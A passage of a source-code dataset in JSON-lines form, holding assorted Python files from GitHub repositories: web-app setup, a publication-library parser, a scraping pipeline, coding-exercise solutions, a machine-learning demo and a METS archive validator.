LOGGER.debug(\n f\"failed\",\n exc_info=exception)\n raise exception\n\n return res\n\n return wrapper\n","repo_name":"FederatedAI/FATE","sub_path":"python/fate_arch/federation/_nretry.py","file_name":"_nretry.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"40930288121","text":"# Package Imports\nimport os\nfrom flask import Flask, render_template\n\n# Local Imports\nfrom sliceofpy.components.database import initialize_tables as init_tables\n\n\ndef create_app(test_config=None):\n\n app = Flask(__name__)\n app.config.from_mapping(\n SECRET_KEY='dev'\n )\n\n if test_config is None:\n app.config.from_pyfile('config.py', silent=True)\n else:\n app.config.from_mapping(test_config)\n\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n @app.route('/')\n @app.route('/index')\n def index():\n init_tables()\n return render_template('index.html', title='SliceOfPy - Index')\n\n return app\n","repo_name":"gurgy11/SliceOfPy","sub_path":"sliceofpy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12711792652","text":"#!/usr/local/bin/python3\n\"\"\"CiteULike Publication objects.\n\nDefines publications from CiteULike service.\n\nThis code is not highly maintained!!!!\n\"\"\"\n\nimport json\nimport sys\nimport urllib.parse\n\nimport publication\n\n\nSERVICE_NAME = \"CiteULike\"\n\n# CUL URLs\n#\n# User library\n# http://www.citeulike.org/user/galaxyproject\n# Group Library\n# http://www.citeulike.org/group/16008/library\n# Particular tag in a user library\n# http://www.citeulike.org/user/galaxyproject/tag/methods\n# Particular tag in a group library\n# http://www.citeulike.org/group/16008/tag/methods\n# AND search in a user library\n# http://www.citeulike.org/search/username?q=tag%3Amethods+%26%26+year%3A2017&search=Search+library&username=galaxyproject\n# AND search in a group library\n# http://www.citeulike.org/search/group?q=tag%3Amethods+%26%26+year%3A2017&search=Search+library&group_id=16008\n\n# Group library in JSON format\n# 
http://www.citeulike.org/json/group/16008\n\nCUL_BASE_URL = \"http://www.citeulike.org\"\n\nCUL_SEARCH_LOGICAL_AND = \"+%26%26+\" # \" && \"\nCUL_SEARCH_YEAR = \"year%3A\" # \"year:\"\nCUL_SEARCH_TAG = \"tag%3A\" # \"tag:\"\n\n# append after user or group to get all papers with a tag.\nCUL_TAG_SUFFIX = \"/tag/\"\n\n\nclass Pub(publication.Pub):\n \"\"\"A publication defined in a CiteULike library.\n\n Initially (and probably forever) the original definition of CUL pubs\n comes from a CUL JSON export of the whole library.\n \"\"\"\n def __init__(self, cul_json):\n \"\"\"Create a CiteULike publication object from CUL JSON.\"\"\"\n\n super(Pub, self).__init__()\n\n self._cul_json = cul_json\n self.title = self._cul_json[\"title\"]\n self.canonical_title = publication.to_canonical(self.title)\n self.cul_id = self._cul_json[\"article_id\"]\n doi = self._cul_json.get(\"doi\")\n if doi:\n doi = publication.to_canonical_doi(doi)\n self.canonical_doi = doi\n self.url = self._cul_json[\"href\"]\n\n # TODO: Type may not be the most useful. It's \"JOUR\" for\n # Journal Article and \"THES\" for thesis. May not map to BibTeX.\n self.pub_type = self._cul_json.get(\"type\")\n\n # Authors is a list of \"First I. Last\"\n author_list = self._cul_json.get(\"authors\")\n if author_list:\n authors = \", \".join(author_list)\n self.set_authors(\n authors,\n self.to_canonical_first_author(author_list[0]))\n else:\n print(\"Warning: CUL Pub '{0}'\".format(self.title), file=sys.stderr)\n print(\" Does not have any authors.\\n\", file=sys.stderr)\n\n published = self._cul_json.get(\"published\")\n if published:\n self.year = published[0]\n else:\n self.year = \"unknown\"\n self.tags = self._cul_json[\"tags\"] # a list\n journal = self._cul_json.get(\"journal\")\n if journal:\n self.canonical_journal = publication.to_canonical(journal)\n else:\n self.canonical_journal = None\n\n # Entry date in CUL JSON looks like \"date\": \"2016-12-22 00:18:58\"\n self.entry_date = self._cul_json.get(\"date\")[0:10]\n\n return None\n\n def to_canonical_first_author(self, cul_author_string):\n \"\"\"Convert a CUL author name to a canonical first author name.\n\n CUL Author name is\n First M. 
Last\n\n Canonical first author is last name of first author.\n \"\"\"\n if cul_author_string:\n by_dots = cul_author_string[0].split(\".\")\n if len(by_dots) > 1:\n # Last name is what follows the last period,\n first_author = by_dots[-1]\n else:\n # or if there is no period, then what follows the last space.\n first_author = cul_author_string.split()[-1]\n canonical_first_author = publication.to_canonical(first_author)\n else:\n canonical_first_author = None\n return canonical_first_author\n\n\nclass PubLibrary(publication.PubLibrary):\n \"\"\"A collection of publications from CiteULike.\"\"\"\n\n def __init__(self, cul_json_lib_path, cul_lib_url):\n \"\"\"Given a file containing a CiteULike JSON export of a library,\n create a publication library containing all the pubs in that library.\n \"\"\"\n super(PubLibrary, self).__init__()\n\n self.url = cul_lib_url\n # URL tell us if user or group library.\n self.is_user_lib = False\n self.is_group_lib = False\n url_parts = urllib.parse.urlparse(self.url)\n if url_parts.path.startswith(\"/user/\"): # \"/user/galaxyproject\n self.is_user_lib = True\n self._cul_username = url_parts.path.split(\"/\")[2]\n elif url_parts.path.startswith(\"/group/\"): # \"/group/16008/library\"\n self.is_group_lib = True\n self._cul_group_id = url_parts.path.split(\"/\")[2]\n else:\n raise ValueError(\n \"Library URL is not recognized as group or user: \"\n + self.url)\n\n cul_file = open(cul_json_lib_path, \"r\")\n cul_json = json.load(cul_file) # read it all at once.\n\n for cul_pub_json in cul_json:\n cul_pub = Pub(cul_pub_json)\n self.add_pub(cul_pub)\n\n cul_file.close()\n self.num_pubs = len(self._by_canonical_title)\n\n return None\n\n def gen_tag_year_url(self, tag, year):\n \"\"\"Given a tag and a year, generate a URL thot shows all papers with\n that tag published in that year.\n\n \"\"\"\n if self.is_user_lib:\n tag_year_url = (\n CUL_BASE_URL\n + \"/search/username?search=Search+library&username=\"\n + self._cul_username\n + \"&q=\"\n + CUL_SEARCH_TAG + tag\n + CUL_SEARCH_LOGICAL_AND\n + CUL_SEARCH_YEAR + year)\n elif self.is_group_lib:\n tag_year_url = (\n CUL_BASE_URL\n + \"/search/group?search=Search+library&group_id=\"\n + self._cul_group_id\n + \"&q=\"\n + CUL_SEARCH_TAG + tag\n + CUL_SEARCH_LOGICAL_AND\n + CUL_SEARCH_YEAR + year)\n\n return tag_year_url\n\n def gen_tag_url(self, tag):\n \"\"\"Given the base URL of a CUL library, e.g.,\n http://www.citeulike.org/group/16008/library\n\n and a tag used in that library, generate a link to all pubs with that\n tag.\n \"\"\"\n if self.is_user_lib:\n tag_url = (\n CUL_BASE_URL\n + \"/user/\"\n + self._cul_username\n + CUL_TAG_SUFFIX\n + tag)\n elif self.is_group_lib:\n tag_url = (\n CUL_BASE_URL\n + \"/group/\"\n + self._cul_group_id\n + CUL_TAG_SUFFIX\n + tag)\n\n return tag_url\n\n def gen_pub_url_in_lib(self, pub):\n \"\"\"given a pub in this library, generate a link to it online.\"\"\"\n\n pub_url = self.url + \"/article/\" + pub.cul_id\n return pub_url\n\n\ndef gen_add_pub_html_link(pub_url):\n \"\"\"Given the URL of a publication, generate a link to add that pub to\n CiteULike.\n \"\"\"\n return (\n 'Submit pub to CiteULike').format(\n pub_url) # TODO: Does this need to be URLencoded?\n","repo_name":"tnabtaf/pub_spork","sub_path":"cul_pub.py","file_name":"cul_pub.py","file_ext":"py","file_size_in_byte":7458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25423898750","text":"broker_url = \"redis://localhost:6379/0\" # Адрес Redis для 
очереди\nresult_backend = (\n \"redis://localhost:6379/0\" # Адрес Redis для хранения результатов задач\n)\n\ntask_routes = {\n \"send_message_to_discord\": \"main-queue\", # Очередь для задачи send_message_to_discord\n \"run_discord_bot\": \"main-queue\", # Очередь для задачи run_discord_bot\n}\n\nworker_prefetch_multiplier = 1 # Установите значение, соответствующее количеству одновременно обрабатываемых задач\n","repo_name":"EvillFuryCat/Midjourney-API","sub_path":"api/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11166885403","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.0'\n\nsetup(name='example',\n version=version,\n description=\"\",\n long_description=\"\"\"\\\n\"\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='',\n author='',\n author_email='',\n url='',\n license='',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n 'restish',\n 'WebError',\n 'repoze.who',\n 'Tempita',\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n[paste.app_factory]\nmain = example.wsgiapp:make_app\n\n[paste.app_install]\nmain = paste.script.appinstall:Installer\n \"\"\",\n )\n","repo_name":"ish/restish","sub_path":"examples/repoze.who/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"29120854519","text":"#! python3\n\"\"\"\nBài 12:\nCâu hỏi: Viết một chương trình chấp nhận chuỗi là các dòng được nhập vào, chuyển các dòng này thành chữ in hoa và in ra màn hình.\nGiả sử đầu vào là: Hello world\nPractice makes perfect\nThì đầu ra sẽ là: HELLO WORLD\nPRACTICE MAKES PERFECT\n\"\"\"\n\n\ndef upperCase(sentence):\n return sentence.upper()\n\n\ndef main():\n sentences = []\n print(\"Input sentence to upper case. 
End by empty line\")\n while True:\n s = input()\n if s:\n sentences.append(s)\n else:\n break\n for s in sentences:\n print(upperCase(s))\n\n\ndef test():\n assert(\"OK\" == upperCase(\"ok\")) # normal case\n assert(\"ASSERT\" == upperCase(\"ASSERT\")) # same case\n assert(\"ASSERT\" == upperCase(\"aSsErT\")) # complex case\n print(\"unit test success.\")\n\n\nif __name__ == \"__main__\":\n test()\n main()\n","repo_name":"mrbug2020/PyLearn_100PythonExercises","sub_path":"resolve-exercises/Ex12.py","file_name":"Ex12.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42047528577","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport logging\nfrom services.base import Base\n\nbase = Base()\nclass SpiderbiddingPipeline(object):\n def process_item(self, item, spider):\n conn, cor = base.connDB()\n try:\n o_id=item['OriginId']\n sql=\"\"\"select OriginId From dotnet_operation.dc_InviteBidForenotice where OriginId=%s\"\"\"\n cor.execute(sql,o_id)\n result=cor.fetchall()\n\n if(len(result)==0):\n insertSql=\"\"\"INSERT INTO dotnet_operation.dc_InviteBidForenotice(Id,CompanyId,OriginId,ForenoticeTitle,\n ContactMan,ContactPhone,Email,OriginalUrl,YGText,InviteBidScopeDes,\n EnterCondition,PublishTime,BmEndDate)\n VALUES(UUID(),%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\"\n cor.execute(insertSql,(item['CompanyId'],item['OriginId'],str(item['ForenoticeTitle']).encode('utf8','ignore'),\n item['ContactMan'],item['ContactPhone'],item['Email'],item['OriginalUrl'],str(item['YGText']).encode('utf8','ignore'),str(item['InviteBidScopeDes']).encode('utf8','ignore'),\n item['EnterCondition'],item['publishTime'],item['BmEndDate'] ))\n conn.commit()\n base.connClose(conn, cor)\n print('inserting operation is successfull!!!!')\n except Exception as e:\n logging.exception(e)\n conn.rollback()\n base.connClose(conn,cor)\n return item\n\n # def process_item(self, item, spider):\n # # return item\n #\n # print(item[\"contact\"])\n # print(item['publishTime'])\n # print(item['registerEndTime'])\n # print(item['title'])\n # # print(item['info'])\n # # print(item['url'])\n","repo_name":"ethanliu0823/Scrapy-python-","sub_path":"SpiderBidding/spiderBidding/spiderBidding/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73368202728","text":"class Vacancy:\n __slots__ = ('name', 'company_name', 'url', 'description', 'salary')\n\n def __init__(self, name, company_name, url, description, salary):\n self.name = name\n self.company_name = company_name\n self.url = url\n self.description = description\n self.salary = salary\n\n\n def __str__(self):\n return f'Название вакансии: {self.name}\\nОрганизация: {self.company_name}\\n'\\\n f'Ссылка на вакансию:{self.url}\\n'\\\n f'Описание вакансии: {self.description}\\n'\\\n f'Зарплата:{self.salary[\"from\"]} - {self.salary[\"to\"]}\\n'","repo_name":"anastasiya1306/course_work","sub_path":"vacancy.py","file_name":"vacancy.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70569977770","text":"\"\"\"XDG-related functions.\"\"\"\nimport os\n\n\n# Using or here so that we don't need to try 
and find $HOME if the prior\n# is configured. We don't *necessarily* need $HOME here.\nXDG_CONFIG_HOME = (os.environ.get('XDG_CONFIG_HOME') or\n os.path.join(os.environ['HOME'], '.config'))\n\nXDG_MUSIC_DIR = (os.environ.get('XDG_MUSIC_DIR') or\n os.path.join(os.environ['HOME'], 'Music'))\n","repo_name":"fennekki/cdparacord","sub_path":"cdparacord/xdg.py","file_name":"xdg.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18025683255","text":"from SDGCBot import pontobiometrico\nfrom SDGCBot import extratordedados\nfrom SDGCBot import calculadoradehoras\nfrom SDGCBot import feriado\nfrom SDGCBot import dadosfuncionario\nimport os\n\n\ntabeladados = dadosfuncionario.dadosfuncionarios(\"dadosfuncionario.csv\")\nmatricula = input(\"Entre com a matricula>>>\")\n\n# ================\n# ENTRADA DE DADOS JOAO\n# ================\nnome = str(tabeladados[0][0])\nmes = str(tabeladados[0][1])\nano = str(tabeladados[0][2])\ncpf = str(tabeladados[0][3])\nmatricula = matricula\ncargahorria = int(tabeladados[0][5])\nlogin = \"-\"\nsenha = \"-\"\n# ================\n\ndatafinal = mes + '-' + ano\ndatainicial = datafinal\n\nparametros_req = {\n 'login': login,\n 'senha': senha,\n 'matricula': matricula,\n 'cpf': cpf,\n 'datafinal': datafinal,\n 'datainicial': datainicial\n}\n\nhtml_str = pontobiometrico.requisitaPesquisa(parametros_req)\nprint(html_str)\n\n\n\n\n\n","repo_name":"jrdutra/projeto-ponto","sub_path":"buscaDadosMatricula.py","file_name":"buscaDadosMatricula.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26324134192","text":"# Decision Tree Classifier\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n# load the iris datasets\ndataset = datasets.load_iris()\n# fitting\nmodel = DecisionTreeClassifier()\nmodel.fit(dataset.data, dataset.target)\nprint(model)\n# predictions\nexpected = dataset.target\npredicted = model.predict(dataset.data)\n# result\nprint(metrics.classification_report(expected, predicted))\nprint(metrics.confusion_matrix(expected, predicted))\n","repo_name":"hjamaan/HaniAlzahrani_MscThesis","sub_path":"CART.py","file_name":"CART.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20574477035","text":"# Link(s): #https://designgurus.org/path-player?courseid=grokking-the-coding-interview&unit=grokking-the-coding-interview_1628743457252_5Unit\n# https://leetcode.com/problems/3sum-closest/description/\n\n\"\"\"\nQuestion:\n\nGiven an array of unsorted numbers and a target number, find a triplet in the array whose sum is as close to the target number as possible, return the sum of the triplet. If there are more than one such triplet, return the sum of the triplet with the smallest sum.\n\"\"\"\n\n\"\"\"\nSample I/O:\n\nInput: [-2, 0, 1, 2], target=2\n\nOutput: 1\n\nExplanation: The triplet [-2, 1, 2] has the closest sum to the target.\n----------------------------\nInput: [0, 0, 1, 1, 2, 6], target=5\n\nOutput: 4\n\nExplanation: There are two triplets with distance '1' from target: [1, 1, 2] & [0,0, 6]. Between these two triplets, the correct answer will be [1, 1, 2] as it has a sum '4' which is less than the sum of the other triplet which is '6'. 
This is because of the following requirement: 'If there are more than one such triplet, return the sum of the triplet with the smallest sum.'\n\"\"\"\n\n# Code goes here\ndef threeSumClosest(nums, target):\n nums.sort()\n numsLength = len(nums) - 1\n lowestSum = float(\"inf\")\n for i in range(0, numsLength):\n firstNum = nums[i]\n remainingSum = target - firstNum\n first = i + 1\n last = numsLength \n while first < last:\n secondNum = nums[first]\n thirdNum = nums[last]\n currentSum = secondNum + thirdNum\n if currentSum == remainingSum:\n return target\n if abs(target - firstNum - currentSum) < abs(target - lowestSum):\n lowestSum = firstNum + currentSum\n if currentSum < remainingSum:\n if firstNum + currentSum < lowestSum:\n lowestSum = firstNum + currentSum\n first += 1\n else:\n last -= 1\n return lowestSum\n\n\"\"\"\nTC: O(N^2) | SC: O(N) # Required for sorting\n\nExplanation:\nWe use a very similar approach here to the \"Triple Sum to Zero\" or \"3Sum\" problem where we were given an unsorted array and we needed\nto find all triplets whose sum was equal to zero.\n\nUsing a trivial approach, we would need 3 nested loops -> O(N^3) TC.\n\nHowever, we can sort this array and then use a two pointer approach to reduce one nested loop.\nWe do this by using the two pointer approach to find a target sum of two elements using a single run.\n\n1. Sort the array (Note/Reminder: two pointer approach only works on sorted arrays)\n2. Iterate through each element of the array\n3. For each element in the outer loop, calculate the remaining sum needed to reach the target.\n4. Set left pointer to the next element of i, and right pointer at the last element of the sorted array.\n5. Use the two pointer approach to move around the pointers to get closest to the required remaining target sum.\n6. If the current sum of two elements is equal to that required sum, return the target sum itself.\n7. Otherwise, check if the current lowest sum being tracked is closer to the target sum vs the sum of the current element pair.\n8. Swap the lowest sum if needed and keep moving the pointers left and right.\n9. Return the lowest sum.\n\"\"\"","repo_name":"rishabhmthakur2/DSA-Practice","sub_path":"Design Gurus/1. 
Two Pointer Approach/Triplet sum closest to target.py","file_name":"Triplet sum closest to target.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11643760428","text":"'''\n给你一个字符串 s,找到 s 中最长的回文子串。\n\n示例 1:\n输入:s = \"babad\"\n输出:\"bab\"\n解释:\"aba\" 同样是符合题意的答案。\n\n示例 2:\n输入:s = \"cbbd\"\n输出:\"bb\"\n\n示例 3:\n输入:s = \"a\"\n输出:\"a\"\n\n示例 4:\n输入:s = \"ac\"\n输出:\"a\"\n\n'''\n\nclass Solution(object):\n # 第一次\n '''\n 时间复杂度 O(n^2) 长度1和2的回文中心分别有n和n-1个,每个回文中心最多会向外扩展n次\n 空间复杂度 O(1)\n '''\n def longestPalindrome1(self, s):\n n = len(s)\n def judge(i,j):\n while True:\n if i >= 0 and j < n and s[i] == s[j]:\n i = i - 1\n j = j + 1\n else:\n return i + 1, j - 1\n start, end = 0, 0\n for center in range(len(s) - 1):\n left1, right1 = judge(center, center)\n left2, right2 = judge(center, center + 1)\n if right1 - left1 > end - start:\n start, end = left1, right1\n if right2 - left2 > end - start:\n start, end = left2, right2\n return s[start : end + 1]\n \n # 第二次\n def longestPalindrome1(self, s):\n n = len(s)\n def Judge(i, j):\n result = []\n while i >= 0 and j < n and s[i] == s[j]:\n result = [i, j]\n i -= 1\n j += 1\n return result\n cnt = -1\n for i in range(n):\n result1 = Judge(i, i)\n result2 = Judge(i, i + 1)\n if result1 and result1[1] - result1[0] > cnt:\n ans = result1\n cnt = result1[1] - result1[0]\n if result2 and result2[1] - result2[0] > cnt:\n ans = result2\n cnt = result2[1] - result2[0] \n return s[ans[0]:ans[1]+1]\n \n\n'''\n中心扩展\n从中心开始判断当前两个指针指向的字母是否相等,随后左后退一步右前进一步判断是否相等\n初始可以指向同一个,即为自己与自己相等长度为1\nababad\n ↑\nababad\n ↑ ↑\nababad\n↑ ↑\n1. 通过一个通用的函数去简化程序,而不是用if判断来考虑每一种情况\n2. 归纳if条件能否放在一起,用同样or或and连接。\n'''\n\n\ns = 'bb'\nS = Solution() \n# with timer.timer('time'):\nre = S.longestPalindrome(s)\nprint(re)\n\n \n \n\n\n \n\n\n\n\n ","repo_name":"He1o/NootBook_LeetCode","sub_path":"old/中心扩展/5.最长回文子串.py","file_name":"5.最长回文子串.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19977030724","text":"\"\"\"\nThis imports every profile, not just faces. 
Slightly larger profiles as result.\n\nIt overwrites the same data pickles to save space.\n\"\"\"\n\nimport pymongo\nfrom db_config import db_connect\n\nfrom pandas.io.json import json_normalize\nimport pandas as pd\nimport numpy as np\n\nfrom PIL import Image\nfrom io import BytesIO\n\ndb = db_connect()\n\n# Importing data\nprofiles = db.twitter_gender\ndata = profiles.find({'annotations': {'$exists': True},\n 'default_profile_image': False},\n {'annotations':1, 'followers_count':1,\n 'friends_count':1, 'id':1, '_id':0})\n\nprint('data imported')\n\n# Flatten & merge & clean\ndef clean_df(df, col_name):\n df.drop(df.filter(regex=col_name), axis=1, inplace=True)\n return df\n\ndef update_nans(df, col_name, col_name2):\n columns = [col for col in df.columns if col_name2 in col]\n print('update_nans info', col_name)\n print(columns)\n for col in columns:\n df[col_name].update(df[col])\n return df\n\ndata = json_normalize(data)\nprint(data.columns)\nprint('df flattened')\nprint('shape data: ', data.shape)\n\nclean_df(data, 'socioe')\n\ndata = data.rename(index=str, columns={'annotations.thomas.image': 'image',\n 'annotations.thomas.gender': 'gender',\n 'annotations.thomas.age': 'age',\n 'annotations.thomas.bot': 'bot',\n 'annotations.thomas.face': 'face',\n 'annotations.thomas.signal': 'signal'\n })\nprint('renamed columns')\n\nfor col in ['image', 'gender', 'age', 'bot', 'face']:\n update_nans(data, col, '.'+col)\nprint('updated columnns')\n\nclean_df(data, 'chris')\nclean_df(data, 'vannesa')\nclean_df(data, 'thomas')\n\n# manual cleaning\ndef manual_clean(df, col, incorrect, correct):\n mask = df[col] == incorrect\n df.loc[mask, col] = correct\n\nmanual_clean(data, 'age', '227', 27)\nmanual_clean(data, 'gender', '0', 'o')\nmanual_clean(data, 'gender', '%2525252525252B', '-')\nmanual_clean(data, 'gender', '%25252525252B', '-')\nmanual_clean(data, 'signal', ' image', 'image')\nmanual_clean(data, 'signal', 'iamge description', 'image description')\nmanual_clean(data, 'signal', '32', '')\nmanual_clean(data, 'signal', 'jandhandle name', 'handle name')\nmanual_clean(data, 'signal', 'twee', 'tweets')\nmanual_clean(data, 'signal', 'image escription', 'image description')\nmanual_clean(data, 'signal', 'image twwets', 'image tweets')\nmanual_clean(data, 'signal', 'escription', 'description')\nmanual_clean(data, 'signal', 'name weets', 'name tweets')\nmanual_clean(data, 'signal', 'image handle descripition', 'image handle description')\nmanual_clean(data, 'signal', 'unage', 'image')\nmanual_clean(data, 'signal', 'twet', 'tweets')\nmanual_clean(data, 'signal', 'o%2Cimage handle', 'image handle')\nprint('manual cleaning done')\n\nfor col in ['age', 'followers_count', 'friends_count']:\n data[col] = data[col].apply(pd.to_numeric, errors='coerce')\nprint('converted columns to numeric')\n\n# Drop unannotated profiles, e.g. 
if no sensible info about profile was visible\ndata.drop(data[(data['bot']==False) & (data['gender']=='-')].index, inplace=True)\n\n# Drop profiles with low amount of followers and 'friends', because --\n# unsure if these were active on Twitter at all or dummy accounts, etc.\n#data.drop(data[(data['followers_count']<100) | (data['friends_count']<100)].index, inplace=True)\n\nprint('shape data: ', data.shape)\n\n# Create images and convert to numpy array for Tensorflow format\n# Tensorflow images require shape: (nb_sample, height=150, width=150, channel=3)\ndef bin2array(img):\n if isinstance(img, bytes) == False:\n return np.nan\n try:\n img = BytesIO(img)\n img = Image.open(img)\n img = img.resize((224, 224), Image.ANTIALIAS)\n img = img.convert('RGB')\n img = np.asarray(img)\n return img\n except:\n return np.nan\n\ndata['image'] = data['image'].apply(bin2array)\ndata = data.dropna(subset=['image'])\nprint('images are converted')\nprint('shape data: ', data.shape)\nprint(data.columns)\n\ndata.to_pickle('data/complete.pkl')\nprint(data[:5])\n\nprint('shape data: ', data.shape)\n\n# Save df as pickle in data folder\ndata['image'].to_pickle('data/images.pkl')\ndata[['gender', 'age', 'signal',\n 'bot', 'followers_count',\n 'friends_count', 'id']].to_pickle('data/info.pkl')\nprint('everything saved')\n","repo_name":"ThomasRthesis/thesis-final","sub_path":"import_all.py","file_name":"import_all.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37206930001","text":"import fnmatch\nimport logging\nimport os\nfrom pathlib import Path\n\nfrom lxml import etree\nfrom lxml.isoschematron import Schematron\n\nfrom importlib_resources import files\n\nimport eark_ip.api.manifests as MNFST\nimport eark_ip.api.resources.schemas as SCHEMA\nimport eark_ip.api.resources.schematron as SCHEMATRON\nfrom eark_ip.model import (\n MetadataStatus,\n TestResult,\n Severity,\n MetadataChecks,\n MetadataResults,\n Checksum,\n ChecksumAlg,\n ProfileDetails\n)\n\nXLINK_NS = 'http://www.w3.org/1999/xlink'\nMETS_NS = 'http://www.loc.gov/METS/'\nQUAL_METS_NS = '{{{}}}'.format(METS_NS)\nMETS_FILENAME = 'METS.xml'\n\nDILCIS_EXT_NS = 'https://DILCIS.eu/XML/METS/CSIPExtensionMETS'\nSCHEMATRON_NS = \"{http://purl.oclc.org/dsdl/schematron}\"\nSVRL_NS = \"{http://purl.oclc.org/dsdl/svrl}\"\nALGS = vars(ChecksumAlg)\n\nclass FileRef():\n \"\"\"Encapsulate the file reference and integrity details found in METS references.\"\"\"\n def __init__(self, path, size, checksum):\n self._path = Path(path)\n self._size = size\n self._checksum = checksum\n\n @property\n def path(self):\n \"\"\"Return the path of the file reference, will be relative to\n package/representation.\"\"\"\n return self._path\n\n @property\n def size(self):\n \"\"\"Return the stated size of the file in bytes.\"\"\"\n return self._size\n\n @property\n def checksum(self):\n \"\"\"Return the recorded Checksum of the file, includes algorithm and value.\"\"\"\n return self._checksum\n\n def __str__(self):\n return '\\'path\\': \\'{}\\' \\'size\\': \\'{}\\' \\'checksum\\': \\'{}\\''.format(self.path,\n self.size,\n self.checksum)\n\nclass MetsValidator():\n \"\"\"Encapsulates METS schema validation.\"\"\"\n def __init__(self, root):\n self.validation_errors = []\n self.schema_wrapper = etree.XMLSchema(file=str(files(SCHEMA).joinpath('wrapper.xsd')))\n self.rootpath = root\n self.represent_mets = {}\n self.file_refs = []\n\n def validate_mets(self, mets):\n '''\n 
Validates a Mets file. The Mets file is parsed with etree.iterparse(),\n which allows event-driven parsing of large files. On certain events/conditions\n actions are taken, like file validation or adding Mets files found inside\n representations to a list so that they will be evaluated later on.\n\n @param mets: Path leading to a Mets file that will be evaluated.\n @return: Boolean validation result.\n '''\n # Handle relative package paths for representation METS files.\n self.rootpath, mets = _handle_rel_paths(self.rootpath, mets)\n try:\n parsed_mets = etree.iterparse(mets, events=('start', 'end'), schema=self.schema_wrapper)\n self._element_processor(parsed_mets)\n except etree.XMLSyntaxError as synt_err:\n self.validation_errors.append(TestResult(rule_id=\"METS\", location=mets,\n message=synt_err.msg.replace(QUAL_METS_NS, \"mets:\"),\n severity=Severity.ERROR))\n except Exception as base_err:\n self.validation_errors.append(TestResult(rule_id=\"METS\", location=mets,\n message=str(base_err), severity=Severity.ERROR))\n status = MetadataStatus.NOTVALID if self.validation_errors else MetadataStatus.VALID\n return status == MetadataStatus.VALID, MetadataChecks(status=status,\n messages=self.validation_errors)\n\n def _element_processor(self, parsed_mets):\n for event, element in parsed_mets:\n # Define what to do with specific tags.\n if event == 'end' and element.tag == _q(METS_NS, 'file'):\n # files\n self.file_refs.append(_file_ref_from_ele(element))\n elif event == 'end' and \\\n element.tag == _q(METS_NS, 'fileGrp') and \\\n element.attrib.get('USE', '').startswith('Representations/'):\n # representation mets files\n self._rep_processor(element)\n elif event == 'end' and element.tag in [_q(METS_NS, 'dmdSec'), _q(METS_NS, 'amdSec')]:\n for ref in element.iter(_q(METS_NS, 'mdRef')):\n self.file_refs.append(_file_ref_from_mdref_ele(ref))\n\n def _rep_processor(self, element):\n # representation mets files\n rep = element.attrib['USE'].rsplit('/', 1)[1]\n for file in element.iter(_q(METS_NS, 'file')):\n file_ref = _file_ref_from_ele(file)\n if os.path.basename(file_ref.path).casefold() == METS_FILENAME.casefold():\n self.represent_mets[rep] = file_ref\n else:\n self.file_refs.append(file_ref)\n\ndef _file_ref_from_ele(element):\n algid = element.attrib.get('CHECKSUMTYPE', None)\n chksm = element.attrib.get('CHECKSUM', None)\n size = element.attrib.get('SIZE', None)\n checksum = None\n ref = None\n for alg in ALGS:\n if getattr(ChecksumAlg, alg) == algid:\n checksum = Checksum(algid, chksm)\n for child in element.getchildren():\n if child.tag == _q(METS_NS, 'FLocat'):\n path = child.attrib[_q(XLINK_NS, 'href')]\n ref = FileRef(path, size, checksum)\n return ref\n\ndef _file_ref_from_mdref_ele(element):\n algid = element.attrib.get('CHECKSUMTYPE', None)\n chksm = element.attrib.get('CHECKSUM', None)\n size = element.attrib.get('SIZE', None)\n checksum = None\n ref = None\n for alg in ALGS:\n if getattr(ChecksumAlg, alg) == algid:\n checksum = Checksum(algid, chksm)\n path = element.attrib.get(_q(XLINK_NS, 'href'), None)\n ref = FileRef(path, size, checksum)\n return ref\n\n\ndef _handle_rel_paths(rootpath, metspath):\n if metspath.startswith('file://./'):\n relpath = 